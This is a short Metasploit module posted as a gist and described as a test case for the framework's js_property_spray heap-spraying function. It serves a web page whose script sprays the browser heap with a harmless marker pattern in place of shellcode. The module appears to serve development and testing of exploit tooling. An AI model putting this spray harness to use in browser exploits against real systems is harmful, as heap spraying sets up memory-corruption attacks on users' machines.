@wchen-r7
Created March 3, 2013 19:39
A test case for Metasploit's heap spraying function: js_property_spray
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  # HTTP server mixin; js_property_spray below comes from this include.
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Heap Spray Test Case",
      'Description'    => %q{ Heap Spray Test Case },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'sinn3r' ],
      'References'     => [ [ 'URL', 'https://community.rapid7.com/community/metasploit/blog' ] ],
      'Platform'       => 'win',
      'Targets'        => [ [ 'Automatic', {} ] ],
      'Privileged'     => false,
      'DisclosureDate' => "Mar 03 2013",
      'DefaultTarget'  => 0))
  end

  # Builds the test page: the JavaScript returned by js_property_spray
  # (which defines sprayHeap) followed by a call to it.
  def load_spray_html(cli, req)
    spray = js_property_spray

    # The "shellcode" here is only a marker pattern (0x4141 ... 0x4747),
    # so the sprayed blocks are easy to recognise in a debugger.
    html = %Q|
    <html>
    <head></head>
    <body>
    <script>
    #{spray}
    var s = unescape("%u4141%u4141%u4242%u4242%u4343%u4343%u4444%u4444%u4545%u4545%u4646%u4646%u4747%u4747");
    sprayHeap({shellcode:s});
    alert("done");
    </script>
    </body>
    </html>
    |

    return html
  end

  # Serves the test page for every request to the module's URI.
  def on_request_uri(cli, request)
    html = load_spray_html(cli, request)
    # Strip two-tab indentation from template lines (no-op if the template is not tab-indented).
    html = html.gsub(/^\t\t/, '')
    print_status("Sending HTML...")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end
end